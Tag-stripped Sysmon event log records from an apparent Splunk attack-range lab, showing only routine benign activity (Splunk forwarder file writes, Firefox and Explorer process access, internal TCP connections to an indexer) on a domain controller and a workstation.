23542300x8000000000000000106708Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.125{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CD574DBF0BE596E210B4F1C456FE87B,SHA256=BB972ECD46E39ED148A186E179ECA39BB1E4E02E4C6A7A55FE431F4C7603377A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106707Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.026{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98CA3C8B4FF5238240641B518242ED89,SHA256=8DC10F398A75D2CCD65EB4D18E08A6431A9BCDD43AAB15183EC2A6B0EB80F32E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083108Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:04.479{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E19E41E000FAE9A2C85CC5E789232748,SHA256=C91AEF256392B820F403B0B0FE7BD7634A908AAED58D8E151C1463441F142810,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106731Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:04.905{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106730Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:04.905{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106729Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:04.905{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b5e9|C:\Program Files\Mozilla Firefox\xul.dll+e5ca8f|C:\Program Files\Mozilla Firefox\xul.dll+1180086|C:\Program Files\Mozilla Firefox\xul.dll+e5842d|C:\Program Files\Mozilla Firefox\xul.dll+e3fec0|C:\Program Files\Mozilla Firefox\xul.dll+1efaf32|C:\Program Files\Mozilla Firefox\xul.dll+19fbad8|C:\Program Files\Mozilla Firefox\xul.dll+19fdc37|C:\Program Files\Mozilla Firefox\xul.dll+178a7e9|C:\Program Files\Mozilla Firefox\xul.dll+1bc113e|C:\Program Files\Mozilla Firefox\xul.dll+16ce303|C:\Program Files\Mozilla Firefox\xul.dll+1b6874a|C:\Program Files\Mozilla Firefox\xul.dll+178ac8a|C:\Program Files\Mozilla Firefox\xul.dll+1bc113e|C:\Program Files\Mozilla Firefox\xul.dll+16ce303|C:\Program Files\Mozilla Firefox\xul.dll+1b6874a|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+187653b|C:\Program Files\Mozilla Firefox\xul.dll+1a86ce0|C:\Program Files\Mozilla Firefox\xul.dll+1a82bd9 23542300x8000000000000000106728Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:04.242{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=096F27314D6766B15840B9CA45C45A42,SHA256=C7E24D0E5FDD4B33000FE4242E42F0373792628F8642B138A0F10E183F71C799,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106727Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:04.192{58E9C193-B483-615A-3602-00000000FC01}71801592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106726Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:04.027{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A24772814CE989B92DAB170203A81653,SHA256=FBBB157EB12826D341F43819D3B7AF7197D57A434E9125AFE6156D641F011852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083110Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:05.479{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B07C1835F845D3824031658B1BE543,SHA256=EE364571562598024D8634173AAD879BB4C66AA1A7358DEE90053BBA551E0162,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.524{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B485-615A-3702-00000000FC01}7248C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.522{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.522{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.522{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106736Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.522{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106735Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.521{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B485-615A-3702-00000000FC01}7248C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106734Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.521{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B485-615A-3702-00000000FC01}7248C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106733Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.521{58E9C193-B485-615A-3702-00000000FC01}7248C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106732Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.042{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A165DD6593DA632A05F3F8E6784B48C6,SHA256=FCB90526FD2ED65D3F874952E378F7717F821C2FB0390416B93AC4CEE217B627,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083109Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:02.814{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50140-false10.0.1.12-8000- 23542300x800000000000000083111Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:06.541{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD7564089BAE8244F8E9FF6EA0599D1,SHA256=043EF0576E06E9E7F4D25A920CE2E8ECC8E9E890A72ED068BA10A0FD15D72C1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.921{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b4a7|C:\Program Files\Mozilla Firefox\xul.dll+8bf380|C:\Program Files\Mozilla Firefox\xul.dll+8b39ad|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000106756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:05.466{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51856-false10.0.1.12-8000- 23542300x8000000000000000106755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.557{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A490214EF18CE5151AD6B930E42680EC,SHA256=E0A73552A06B5C680BC54D8D8E55B02DAF06A542284F87714946A956F864200C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.504{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.504{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.504{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.489{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.489{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.489{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.489{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.426{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.426{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.426{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.425{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program 